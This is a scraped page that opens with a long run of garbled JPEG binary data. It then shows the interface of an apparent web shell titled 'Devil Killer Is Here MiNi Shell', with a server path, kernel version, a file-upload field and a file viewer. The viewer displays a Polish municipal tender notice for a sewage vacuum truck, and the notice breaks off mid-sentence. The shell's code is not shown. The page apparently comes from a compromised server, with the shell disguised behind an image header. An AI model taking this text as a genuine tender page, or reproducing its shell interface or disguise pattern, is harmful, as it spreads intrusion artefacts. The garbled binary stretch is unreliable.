JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230718/0031195701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup wraz z dostawą wozu asenizacyjnego do obsługi przydomowych oczyszczalni ścieków” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Usług Komunalnych „KOMUNALNI” Spółka z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210019445</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 8a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobiegniew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-520</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@komunalnidobiegniew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://komunalnidobiegniew.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup wraz z dostawą wozu asenizacyjnego do obsługi przydomowych oczyszczalni ścieków” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dbc9bc93-2540-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00311957</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00029492/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 „Zakup wraz z dostawą wozu asenizacyjnego do obsługi przydomowych oczyszczalni ścieków”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie współfinansowane ze środków UE w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-dbc9bc93-2540-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:<br/>Pan Sławomir Zalewski, e-mail: slawomir.zalewski@komunalnidobiegniew.pl<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>slawomir.zalewski@komunalnidobiegniew.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy&#34;.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze&#34; („Formularze do<br/>komunikacji&#34;). Za pośrednictwem „Formularzy do komunikacji&#34; odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik&#34;).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>13. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji&#34; w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy&#34; na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji&#34; służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>14. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja&#34;.<br/>15. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>16. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>17. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art.13 RODO w przypadku zbierania danych<br/>osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego. 1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016<br/>r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>􀀁􀀁 administratorem Pani/Pana danych osobowych jest Przedsiębiorstwo Usług Komunalnych „Komunalni” Spółka z o.o.” siedzibą<br/>przy ul. Poznańska 8a, 66-520 Dobiegniew, tel./fax 95 76 11 054, adres poczty elektronicznej: sekretariat@komunalnidobiegniew.pl,<br/>adres strony internetowej: www.komunalnidobiegniew.pl<br/>􀀁􀀁 kontakt z inspektorem ochrony danych osobowych (IDO): e-mail: slawomir.zalewski @komunalnidobiegniew.pl<br/>tel. 95 76 11 052<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn.„Sukcesywna dostawa opału transportem kołowym dla Przedsiębiorstwa Usług Komunalnych<br/>„KOMUNALNI” Spółka z o.o. w Dobiegniewie w okresie grzewczym 2021/2022<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>(komisja przetargowa) oraz odpowiednie organy kontroli w zakresie ich kompetencji;<br/>􀀁􀀁 dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą być przechowywane<br/>przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach<br/>(t.j. Dz. U. z 2018 r. poz. 217 z późn. zm.) i przepisów wykonawczych do tej ustawy;<br/>􀀁􀀁 obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z<br/>udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>􀀁􀀁 w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>2. Prawa osób których dane są przetwarzane:<br/>􀀁􀀁 prawo dostępu do danych osobowych;<br/>􀀁􀀁 prawo do sprostowania danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania);<br/>􀀁􀀁 prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>􀀁􀀁 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy;<br/>􀀁􀀁 nie przysługuje Pani/Panu:<br/>• prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych;<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest<br/>konieczność wypełnienia obowiązku prawnego ciążącego na zamawiającym lub wykonanie umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup wraz z dostawą na potrzeby Zamawiającego jednego kompletnego nowego fabrycznie<br/>wozu asenizacyjnego (rok produkcji 2023 r.) do obsługi przydomowych oczyszczalni ścieków wyposażonego w co najmniej:<br/>PODWOZIE:<br/>Dopuszczalna max. masa całkowita 9,0 ton, dopuszczalne obciążenie osi przedniej min. 3 tony, osi tylnej min. 5,8 tony.<br/>Podwozie fabrycznie nowe: rok produkcji minimum 2023, dwuosiowe z tylnymi kołami w układzie „bliźniak”.<br/>Rozstaw osi max. 3.400 mm.<br/>Silnik:<br/>- moc silnika min. 170 KM,<br/>- silnik spełniający normy emisji spalin zgodną z obowiązującymi przepisami, min. EURO 6,<br/>- skrzynia biegów zautomatyzowana lub automatyczna z możliwością zmiany biegów w trybie automatycznym na<br/>manualnym,<br/>Oś tylna wyposażona w:<br/>- stabilizator tylnej osi,<br/>- mechanizm różnicowy o zwiększonym tarciu.<br/>Układ hamulcowy:<br/>- hamulec osi przedniej i tylnej – tarczowe,<br/>- układ hamulcowy min. z systemem ABS i ESP.<br/>Układ kierowniczy:<br/>- ze wspomaganiem,<br/>- koło kierownicy z regulowaną wysokością i pochyleniem oraz poduszką powietrzną.<br/>Układ elektryczny:<br/>- ogranicznik prędkości do 90 km/h,<br/>- światła do jazdy dziennej,<br/>- elektrycznie podnoszone szyby,<br/>- asystent hamowania awaryjnego,<br/>- asystent utrzymania pasa ruchu,<br/>- asystent ruszania na wzniesieniu.<br/>Zbiornik paliwa min. 100 litrów z zamykanym korkiem,<br/>Koła:<br/>- obręcze kół o wymiarze min. 17”,<br/>- opony tylnej osi – bieżnik trakcyjny,<br/>- wszystkie opony pojazdu jednego producenta,<br/>- koło zapasowe z oponą tego samego typu i producenta co opony pojazdu,<br/>Kabina spełniająca wymagania i wyposażona min w:<br/>- trzymiejscowa,<br/>- kolor kabiny biały,<br/>- odchylana,<br/>- komfortowe siedzenie kierowcy z regulowanym tłumieniem drgań i podłokietnikiem,<br/>- lusterka wsteczne ogrzewane,<br/>- klimatyzacja,<br/>- oświetlenie zgodne z obowiązującymi przepisami ruchu drogowego,<br/>- lampy ostrzegawcze z kloszami w kolorze żółtym na dachu kabiny,<br/>- centralny zamek sterowany pilotem,<br/>- dwa komplety kluczyków (2 kluczyki z pilotem),<br/>- komputer pokładowy,<br/>- tachograf cyfrowy,<br/>- immobilizer,<br/>- osłona przeciwsłoneczna przed szybą czołową,<br/>- radio.<br/>ZABUDOWA<br/>Kolor zabudowy – do ustalenia z Zamawiającym po wyborze oferty.<br/>Zbiornik umieszczony na ramie pośredniej o pojemności min. 3.000 litrów podzielony na:<br/>- komora nieczystości o pojemności min. 2.000 litrów,<br/>- komora czystej wody technicznej o pojemności min. 1.000 litrów.<br/>Zawór spustowy na pokrywie zbiornika umieszczony w 1/3 i 2/3 wysokości.<br/>Zbiornik z możliwością połączenia obu komór zaworem by-pass umożliwiający zwiększenie łącznej pojemności zbiornika<br/>wody czystej do 3000 l.<br/>Pokrywa tylna zbiornika - dennica otwierana i zamykana hydraulicznie, blokowana (ryglowana) 4 punktowo poprzez<br/>sworznie przesuwane siłownikami hydraulicznymi z regulacją docisku, powleczona powłoką ochronną. Wyposażona w<br/>zawory ssący Ø 75 mm i spustowy Ø 75 mm,<br/>Lampa ostrzegawcza z kloszem w kolorze żółtym umieszczona z tyłu zabudowy.<br/>Dysze płuczące wewnątrz zbiornika ułatwiające jego opróżnienie.<br/>Belka zabezpieczająca pojazd przed wjechaniem z tyłu w przeszkodę.<br/>Wskaźnik poziomu napełnienia zbiornika nieczystości.<br/>Obie pompy wraz z układami napędowymi oraz układem chłodzenia (zbiornik, filtry, wentylatory) umieszczone w oświetlonej<br/>światłami LED zamkniętej przestrzeni w przedniej części zabudowy. Dostęp do przestrzeni zamykany roletami zwijanymi do<br/>góry o szerokości min. 1100 mm w celu swobodnego dostępu podczas prac serwisowych oraz zamykane na klucz przed<br/>niepowołanym dostępem.<br/>Wysokość samochodu po zabudowie max. 2,50 m.<br/>Długość pojazdu po zabudowie max. 6,5 m.<br/>UKŁAD NAPĘDOWY:<br/>Niezależny przemysłowy silnik wysokoprężny o mocy min. 35 kW z rozrusznikiem elektrycznym wyposażony w licznik<br/>motogodzin .<br/>UKŁAD SSANIA:<br/>Pompa próżniowa chłodzona cieczą o min. parametrach: 0,85 bar ssanie, 0,5 bar tłoczenie. Wydajność pompy min. 720<br/>m3/h. Napęd pompy poprzez sprzęgło magnetyczne umożliwiające jej włączenie i wyłączenie z poziomu pulpitu<br/>sterowniczego.<br/>Obrotowy bęben o napędzie ręcznym do magazynowania węża ssącego umieszczony pionowo z boku zbiornika. Na bębnie<br/>zmontowany wąż ssący o średnicy wewnętrznej DN 75 mm i długości min 15 m.<br/>UKŁAD WYSOKOCIŚNIENIOWY:<br/>Pompa wysokociśnieniowa o parametrach min: ciśnienie 140 bar, wydatek wody: 70l/min. Napęd pompy poprzez sprzęgło<br/>magnetyczne umożliwiające jej włączenie i wyłączenie z poziomu pulpitu sterowniczego. Zabezpieczenie pompy przed<br/>pracą na sucho.<br/>Bęben na wąż ciśnieniowy obracany hydraulicznie poprzez przekładnię łańcuchową (nawijanie/rozwijanie węża<br/>ciśnieniowego) z płynną regulacją prędkości w obu kierunkach umieszczony na tylnej części pojazdu. Na bębnie nawinięty<br/>wąż ciśnieniowy DN 13 mm i długości min. 100 m. Zakucie ½.<br/>Bęben (tarcze składane z 12 elementów celem usztywnienia i wzmocnienia konstrukcji) wykonany ze stali nierdzewnej,<br/>wyposażony w samozawracający mechanizm śrubowy do automatycznego układania węża DN 13 zsynchronizowany z<br/>obrotami bębna ciśnieniowego.<br/>Zamawiający wymaga aby była zapewniona możliwość pracy obydwu pomp / ssącej i wysokociśnieniowej /jednocześnie.<br/>Elementy wyposażenia :<br/>- głowica kanałowa z pilotem,<br/>- głowica kanałowa ślepa,<br/>- głowica udrażniająca stożkowa,<br/>- rolka prowadząca wąż górna,<br/>- wąż ochronny,<br/>- pistolet wysokociśnieniowy z lancą.<br/>STEROWANIE:<br/>Sterowanie zabudową powinno odbywać się za pomocą wodoszczelnego panelu sterowania wykonanego ze stali<br/>kwasoodpornej zamykanego na odrębny klucz oraz pilotem zdalnego sterowania.<br/>Funkcje panelu sterowniczego – wymagane minimum:<br/>- obsługa rozrusznika,<br/>- regulacja obrotów silnika,<br/>- wyłącznik bezpieczeństwa,<br/>- włącznik/ wyłącznik pompy ssącej i ciśnieniowej,<br/>- licznik motogodzin,<br/>- sygnalizacja niskiego poziomu oleju i wody,<br/>- rozwijanie/zwijanie węża ciśnieniowego z regulacją prędkości<br/>- włącznik/wyłącznik lampy roboczej,<br/>- gniazdo 12 V.<br/>Zdalne sterowanie radiowe -PILOT<br/>Funkcje zdalnego sterowania-minimalne wymagania:<br/>- wyłącznik bezpieczeństwa,<br/>- start – stop silnika samochodu,<br/>- włączanie/wyłączanie pompy ciśnieniowej,<br/>- włączanie/wyłączanie pompy ssącej,<br/>- regulacja obrotów silnika,<br/>- rozwijanie/zwijanie węża ciśnieniowego z regulacją prędkości.<br/>Pilot zdalnego sterowania należy wyposażyć w ładowarkę i dwa akumulatory. Powinien posiadać możliwość fizycznego<br/>odłączenia od pojazdu w przypadku, gdy nie jest wykorzystywany.<br/>DODATKOWE WYMAGANIA:<br/>Pełne zabezpieczenie antykorozyjne zabudowy.<br/>Komplet dodatkowych węży ssących min. 3 szt. oraz rura ssąca z rozdrabniaczem twardych osadów,<br/>Rynna spustowa, wykonana ze stali nierdzewnej.<br/>Uchwyt trzymający pachołki drogowe.<br/>Zabudowa wyposażona w zamykany pojemnik na osprzęt po prawej i lewej stronie pojazdu. Pojemnik wykonany z<br/>aluminium dopasowany do rozmiarów zabudowy.<br/>Tablica informacyjna po jednej stronie zbiornika wykonana z aluminium.<br/>Układ cyrkulacji wody umożliwiający pracę w warunkach temperatur ujemnych ( do temperatury -50 C)<br/>Oświetlenie tylnego stanowiska pracy operatora (lampa halogenowa).<br/>Opisy na panelu sterowania i całej zabudowie w języku polskim (dotyczące obsługi urządzenia).<br/>WYMAGANE DOKUMENTY:<br/>Do oferty należy dołączyć karty katalogowe zawierające zdjęcie, opis i rysunek oraz nazwę producenta, model pomp,<br/>potwierdzające że zastosowane elementy są zgodne z opisaną specyfikacją.<br/>Oferowany pojazd nie może być prototypem.<br/>Do oferty należy dołączyć referencje z dostawy co najmniej 3 samochodów specjalnych z niezależnym silnikiem spalinowym<br/>napędzającym pracę zabudowy, udokumentowane listami referencyjnymi, wydanymi przez polskich użytkowników w okresie<br/>ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie.<br/>Przedmiotem dostawy jest również dostarczenie w dniu przekazania przedmiotu zamówienia dokumentów takich jak:<br/>- instrukcja obsługi w języku polskim,<br/>- karta gwarancyjna wraz z OWG,<br/>- katalog części zamiennych,<br/>- dokumenty niezbędne do zarejestrowania pojazdu jako pojazd specjalny.<br/>Ponadto zamawiający wymaga przeszkolenia na koszt Wykonawcy pracowników Zamawiającego w zakresie obsługi<br/>dostarczonego pojazdu – min. 2 dni robocze z użyciem pojazdu będącego przedmiotem umowy.<br/>WAŻNA INFORMACJA:<br/>• Kompletny pojazd przy zapełnieniu zbiorników roboczych zabudowy wodą w minimum 85% wraz z osprzętem i obsługą nie<br/>może przekraczać dopuszczalnej masy całkowitej oraz przekraczać dozwolonych nacisków na osie określonych w polskich<br/>przepisach.<br/>• Zamawiający nie dopuszcza rozwiązań, w których pompy nadbudowy ciśnieniowo-ssącej napędzane są z silnika podwozia<br/>samochodu.<br/>Samochód musi spełniać 